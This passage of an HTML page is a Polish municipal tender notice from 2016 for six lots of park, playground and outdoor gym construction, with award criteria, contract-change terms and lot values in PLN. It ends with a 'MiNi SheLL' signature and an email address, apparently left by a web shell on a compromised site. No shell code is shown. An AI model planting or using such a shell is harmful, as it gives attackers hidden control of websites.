                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana umowy może nastąpić w następujących  przypadkach:
a)	co do terminu zakończenia zamówienia, który może być przedłużony wskutek:
a.	wystąpienia zdarzeń siły wyższej, uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami; 
b.	wstrzymania robót przez Zamawiającego albo przerw w wykonywaniu robót powstałych na skutek okoliczności, za które ponosi odpowiedzialność Zamawiający  przy zastrzeżeniu, że powyższe okoliczności wymagać będą pisemnego udokumentowania pod rygorem utraty prawa powoływania się na nie przez Wykonawcę;
c.	konieczności zmian dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót;
d.	wystąpienia niekorzystnych warunków atmosferycznych, uniemożliwiających prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które wykonawca ponosi odpowiedzialność;
e.	gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji;
f.	wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które wykonawca ponosi odpowiedzialność;
g.	gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które wykonawca ponosi odpowiedzialność;
h.	jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od wykonawcy;
b)	co do wynagrodzenia może nastąpić w przypadku ustawowej zmiany stawki  
podatku VAT o kwotę wynikającą ze zmienionych stawek tego podatku obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania nin. umowy;
c)	dopuszcza się na etapie realizacji zamówienia możliwość dokonania zmiany albo rezygnacji z podwykonawcy, na zasoby którego Wykonawca powoływał się na zasadach określonych w art. 22a ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, pod warunkiem, że Wykonawca wykaże Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia powyższe warunki udziału w postępowaniu w stopniu nie mniejszym niż wymaganym w trakcie postępowania o udzielenie zamówienia. Zmiana taka nie wymaga zawarcia aneksu do umowy,
d)	co do nieistotnych postanowień umowy.

Wszelkie okoliczności związane z przypadkami określonymi powyżej powinny być szczegółowo udokumentowane przez Wykonawcę.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/10/2016, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Osiedle Biała Północ: Park rekreacyjny w dzielnicy Biała Północ (Obszary)  zielony skwer.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie utwardzonego skweru wypoczynkowego (nawierzchnia z kostki niefazowanej), nasadzenia drzew i krzewów, zamontowanie 4 ławek z oparciem i 2 koszy na śmieci, ułożenie palisady betonowej, wykonanie chodnika z kostki brukowej betonowej, inwentaryzacja geodezyjna:
a)	  chodnik z kostki grubości 6 cm;
b)	wykonanie nawierzchni z kostki niefazowanej;
c)	wykonanie nawierzchni z kory (zrębki);
d)	wykonanie obrzeży i palisady
e)	zieleń, roboty porządkowe i regeneracyjne;
f)	montaż urządzeń zabawowych i małej architektury;
g)	obsługa geodezyjna.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233260-9, 45112723-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  45657.52<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Osiedle Mikuszowice Krakowskie: Plac zabaw i siłownia w Mikuszowicach Krakowskich.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie nawierzchni bezpiecznej przerostowej pod cały plac zabaw oraz pod montowane urządzenia siłowni zewnętrznej, zamontowanie zestawu typu zamek, zamontowanie 2 urządzeń siłowni zewnętrznej: Wioślarz + Prasa Nożna, Biegacz + Orbitrek, uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	  roboty przygotowawcze;
b)	roboty ziemne  wykonanie wykopu;
c)	wykonanie nawierzchni bezpiecznej, przerostowej;
d)	montaż urządzeń placu zabaw;
e)	montaż urządzeń siłowni zewnętrznej;
f)	uporządkowanie terenu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45212220-4, 45111200-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  49617.27<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Osiedle Mikuszowice Krakowskie: Podest betonowy.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie utwardzonego placu z betonu C25/30 o gr.10 cm, o powierzchni zacieranej o wymiarach 12 x 12 m, zazbrojoną siatką z prętów fi8 o oczku 10 x 10 cm, posadowioną na podbudowie z kruszywa łamanego gr. 30 cm:
a)	   roboty przygotowawcze;
b)	roboty ziemne  wykonanie wykopu;
c)	wykonanie nawierzchni betonowej;
d)	uporządkowanie terenu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45212220-4, 45111200-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  12170.40<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Centrum rekreacyjno-parkowe w Komorowicach Śląskich.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Chodnik o nawierzchni z kostki brukowej, bezfazowej od ul. Aktorów oraz od ul. Mazańcowickiej, furtka wejściowa w istniejącym ogrodzeniu od ul. Aktorów, ogrodzenie placu zabaw ogrodzeniem systemowym, panelowym z elementami ozdobnymi wraz z dwoma furtkami, rozbiórka istniejącego ogrodzenia, wykonanie nawierzchni bezpiecznej przerostowej pod cały plac zabaw oraz montaż urządzeń placu zabaw (huśtawki mix, 2 kiwaków, huśtawki wagowej, piaskownicy, linarium) i elementów małej architektury (2 ławek parkowych i 1 kosza na śmieci, tablicy z regulaminem), uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	  roboty przygotowawcze;
b)	rozbiórka elementów ogrodzeń;
c)	roboty ziemne  wykonanie wykopu;
d)	wykonanie nawierzchni bezpiecznej;
e)	wykonanie nawierzchni z kostki brukowej betonowej;
f)	montaż urządzeń placu zabaw;
g)	montaż urządzeń małej architektury;
h)	ogrodzenie zewnętrzne;
i)	uporządkowanie terenu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45212220-4, 45111200-0,
                    45112723-9,
                    45233260-9,
                    45342000-6,
                    45223810-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  57127.38<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Osiedle Straconka: Zagospodarowanie terenu zielonego na cele sportowo-rekreacyjne w Straconce Zielony zakątek  kontynuacja.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie nawierzchni z płyt gumowych, przerostowych, urządzenia zabawowe (piramida wspinaczkowa, huśtawka Bocianie Gniazdo, karuzela, bujak, piaskownica, tablica z regulaminem), uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	   roboty przygotowawcze;
b)	wykonanie nawierzchni bezpiecznej;
c)	montaż urządzeń placu zabaw;
d)	montaż urządzeń małej architektury;
e)	uporządkowanie terenu.
Proszę nie wyceniać niżej wymienionych pozycji przedmiaru:
10d1.2, 11d1.2, 15d.2
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45212220-4, 45111200-0,
                    45236290-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  58066.37<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Osiedle Biała Wschód: Doposażenie Ogródka Jordanowskiego.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Montaż urządzeń małej architektury (urządzenia do street workout, kosz na śmieci i ławka z oparciem), nawierzchnia bezpieczna przerostowa pod streetworkout, wykonanie chodnika z utwardzonej nawierzchni z kostki brukowej niefazowanej, uporządkowanie terenu, inwentaryzacja geodezyjna:
a)	  roboty przygotowawcze;
b)	wykonanie nawierzchni bezpiecznej;
c)	wykonanie nawierzchni z kostki brukowej;
d)	montaż urządzeń małej architektury;
e)	uporządkowanie terenu.
Proszę nie wyceniać niżej wymienionych pozycji przedmiaru:
20d2.2
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45212220-4, 45233260-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  56796.71<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com